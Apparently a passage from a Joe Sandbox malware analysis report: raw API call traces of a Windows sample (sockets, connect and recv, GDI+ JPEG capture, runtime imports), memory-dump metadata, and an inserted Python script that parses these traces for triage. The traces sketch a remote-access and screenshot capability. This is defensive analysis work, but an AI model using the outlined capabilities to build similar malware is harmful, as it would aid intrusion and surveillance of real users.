                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040DC4B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC57
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,?,00000000,00000000,?,00000000,00000002,?,00000000,00000003,?,?), ref: 0040DC9F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000003,?,?,?,?,?,?,00000001), ref: 0040DCAF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DCBF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DCCF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DCDF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DCEF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DCFF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DD09
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD21
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD2D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD39
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD45
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD51
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD5D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD69
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD72
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$Hstd@@V?$basic_string@$G@std@@V10@0@$D@2@@0@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@D@1@@G@2@@0@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@CreateFileG@1@@V01@V10@
                                                • String ID:
                                                • API String ID: 1785028988-0
                                                • Opcode ID: 9f9d1182f2fc15583929cf17a1554aebeb218aca5fa8146dec45e650895f7836
                                                • Instruction ID: 38fc57fc2121e37178f0118e06747127780e12511175b92f8b90c33b557dd1ef
                                                • Opcode Fuzzy Hash: 9f9d1182f2fc15583929cf17a1554aebeb218aca5fa8146dec45e650895f7836
                                                • Instruction Fuzzy Hash: 3C51E3B1C00119ABDF15BBA0DD5AEEF773CAB14305F0041AAF506E20A1EE785B89CB59
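The per-function API lists above are the raw material for triage, but reading dozens of mangled MSVCP60 names by hand to find the handful of Win32 calls that matter (RegEnumKeyExW/RegEnumValueW in the function at 0040AEEC, getenv("Temp") followed by ShellExecuteExA, WaitForSingleObject and DeleteFileA in the function at 0040EBA0) is slow. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses bullet lines in exactly the format used above (including the "Part of subcall function" indirection), drops the std::string runtime noise, tags a function with a capability only when every API in a small set appears in its list, and decodes the memory-dump file names. The capability table and the dump-name field layout are the author's assumptions (the layout is inferred from this report: the first two fields match the "hcaresult_11_2_400000" snapshot name and the fifth takes PAGE_* values across the five dumps); the sample lines are copied from the records on this page.

```python
import re
from collections import Counter

# Constructed sample: API lines copied verbatim from the function records in this report.
SAMPLE_APIS = """\
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040AEEC
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0040AF1B
• ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041417C,?), ref: 0040AF31
• RegEnumValueW.ADVAPI32(?,?,?,00003FFF,00000000,?,?,00002710), ref: 0040AFC4
• getenv.MSVCRT ref: 0040EBAC
• ShellExecuteExA.SHELL32(0000003C), ref: 0040EC61
• WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040EC99
• DeleteFileA.KERNEL32(00000000), ref: 0040ECB2
  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
• LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040F550
• GetProcAddress.KERNEL32(00000000), ref: 0040F557
• GdiplusStartup.GDIPLUS(00419E14,?,00000000,00000000,00000000,00000000), ref: 0040F53C
"""

# One bullet line: optional "Part of subcall function XXXXXXXX:", then api.MODULE(args), ref: addr.
# Mangled MSVC names never contain '.', so the first '.' separates api from module.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

def parse_api_lines(text):
    """Turn the report's bullet lines into call records (api, module, args, ref, subcall)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m["args"] or ""
        calls.append({
            "api": m["api"],
            "module": m["mod"].upper(),
            "args": [a for a in args.split(",") if a],
            "ref": int(m["ref"], 16),                            # call site inside the dump
            "subcall": int(m["sub"], 16) if m["sub"] else None,  # set when reached via a callee
        })
    return calls

# Hypothetical capability table (author's assumption): a label is claimed only when every API in
# the set occurs in the same function's list. Only combinations seen in this report are listed.
CAPABILITIES = {
    "registry enumeration": {"RegQueryInfoKeyW", "RegEnumKeyExW", "RegEnumValueW"},
    "drop-and-run via ShellExecuteEx, then delete": {"ShellExecuteExA", "WaitForSingleObject", "DeleteFileA"},
    "runtime import resolution": {"LoadLibraryA", "GetProcAddress"},
    "GDI+ image handling": {"GdiplusStartup"},
    "process enumeration via Toolhelp": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
}

def summarize(calls):
    """Collapse a function's call list to its non-runtime APIs and the capabilities they support."""
    apis = {c["api"] for c in calls if c["module"] != "MSVCP60"}   # drop std::string noise
    found = sorted(name for name, needed in CAPABILITIES.items() if needed <= apis)
    return {"apis": sorted(apis), "capabilities": found,
            "modules": Counter(c["module"] for c in calls)}

# Windows memory constants. The dump-name field layout is an assumption inferred from this report:
# field 1 process index, field 2 run, field 4 base address, field 5 page protection, field 7 region type.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

def decode_dump_name(name):
    """Decode a '<proc>.<run>.<id>.<base>.<protect>.<x>.<type>.<x>.sdmp' dump file name."""
    f = re.sub(r"\.sdmp$", "", name).split(".")
    if len(f) != 8:
        raise ValueError("unexpected dump name: %s" % name)
    protect, mtype = int(f[4], 16), int(f[6], 16)
    return {"process": int(f[0], 16), "run": int(f[1], 16), "base": int(f[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "type": MEM_TYPE.get(mtype, hex(mtype))}

if __name__ == "__main__":
    summary = summarize(parse_api_lines(SAMPLE_APIS))
    print("APIs:", ", ".join(summary["apis"]))
    print("capabilities:", summary["capabilities"])
    print(decode_dump_name("0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp"))
```

The labels are heuristics, not verdicts: a set is only matched within one function's list, so a capability split across callees (the subcall lines) or reached through GetProcAddress-resolved pointers is missed, which is why the runtime import resolution label is worth flagging on its own. Decoding the dump names also makes the injection finding in the overview concrete: the region at 0x400000 in process 11 is PAGE_EXECUTE_READWRITE and, on the assumed layout, MEM_PRIVATE rather than MEM_IMAGE, which is what a manually written PE looks like.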
                                                APIs
                                                • GdiplusStartup.GDIPLUS(00419E14,?,00000000,00000000,00000000,00000000), ref: 0040F53C
                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040F550
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040F557
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F573
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419E78), ref: 0040F5B0
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F5C7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F5D1
                                                  • Part of subcall function 0040F7DE: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F7FB
                                                  • Part of subcall function 0040F44E: malloc.MSVCRT ref: 0040F475
                                                  • Part of subcall function 0040F8AD: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,?,0040F63E,00000000,?,?), ref: 0040F8BF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F65B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F679
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F69C
                                                • _itoa.MSVCRT ref: 0040F6A3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00419288,?,00419288,00419E78), ref: 0040F70F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00419E78), ref: 0040F71F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,00419E78), ref: 0040F72C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010,?,?,?,?,?,?,?,?,?,?,00419288,00419E78), ref: 0040F74A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00419288,00419E78), ref: 0040F756
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,00419E78), ref: 0040F736
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00419288,?), ref: 0040F777
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040F781
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F798
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                  • Part of subcall function 0040209F: CreateThread.KERNEL32(00000000,00000000,004020BE,?,00000000,00000000), ref: 004020B4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F7A1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F7B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@?size@?$basic_string@$?c_str@?$basic_string@GdipImageLoadStreamV01@@V10@@$AddressCreateD@1@@FromGdiplusLibraryProcSaveStartupThread_itoaconnectmallocsocket
                                                • String ID: Shlwapi.dll$image/jpeg
                                                • API String ID: 4077105796-2405822940
                                                • Opcode ID: 744f190398c45c5295d74e012c4cd3f911941621ca571fd9729935498b805eda
                                                • Instruction ID: 0902b66ebe8e66bcf283abf585539d0e06dcd29df124a44d81a897caf893abc6
                                                • Opcode Fuzzy Hash: 744f190398c45c5295d74e012c4cd3f911941621ca571fd9729935498b805eda
                                                • Instruction Fuzzy Hash: 8D716A72900218ABDB14EFA0DC999EF7779FF04305F00847AF506A7191EBB85E48CB69
                                                APIs
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 004033B7
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004033CA
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004033D3
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004033F6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403403
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040340F
                                                • recv.WS2_32(?,?,0000FDE8,00000000), ref: 00403435
                                                • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,?,?,0000FDE8,00000000), ref: 00403452
                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040345F
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403474
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00403482
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?), ref: 0040349A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004034D1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004034DA
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000FDE8), ref: 004034FE
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00403518
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403526
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403530
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040354A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403553
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040355C
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000FDE8,6C995E04), ref: 00403579
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403583
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040358C
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040359E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0000FDE8,00000000), ref: 004035A9
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035B2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V01@V01@@$??0?$basic_string@$?size@?$basic_string@D@1@@$??4?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@V12@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?substr@?$basic_string@D@2@@0@V?$basic_string@recv
                                                • String ID:
                                                • API String ID: 2818948955-0
                                                • Opcode ID: aa899feeba4e6f35b80c8897467dae3091108f0991ed6115fa67930e850ae9d9
                                                • Instruction ID: 04fde0090eaa549d1e8094109e4273bbcff85efc6524e75e66a8ef0d5c5eb47d
                                                • Opcode Fuzzy Hash: aa899feeba4e6f35b80c8897467dae3091108f0991ed6115fa67930e850ae9d9
                                                • Instruction Fuzzy Hash: A051E97190001AEBCF05EF90DC998EE7F39EB15306F0441BAF506A61A1DB74AB86CB58
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004028AC
                                                • SetEvent.KERNEL32(?), ref: 004028B5
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004028BE
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 004028D6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 004028E6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004028F5
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00402930
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402943
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00402975
                                                • TranslateMessage.USER32(?), ref: 00402983
                                                • DispatchMessageA.USER32(?), ref: 0040298D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0041375C,?), ref: 0040295F
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004029AA
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(004196B0,00000000,DisplayMessage), ref: 00402A02
                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402A14
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402A3A
                                                • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402A4E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A61
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
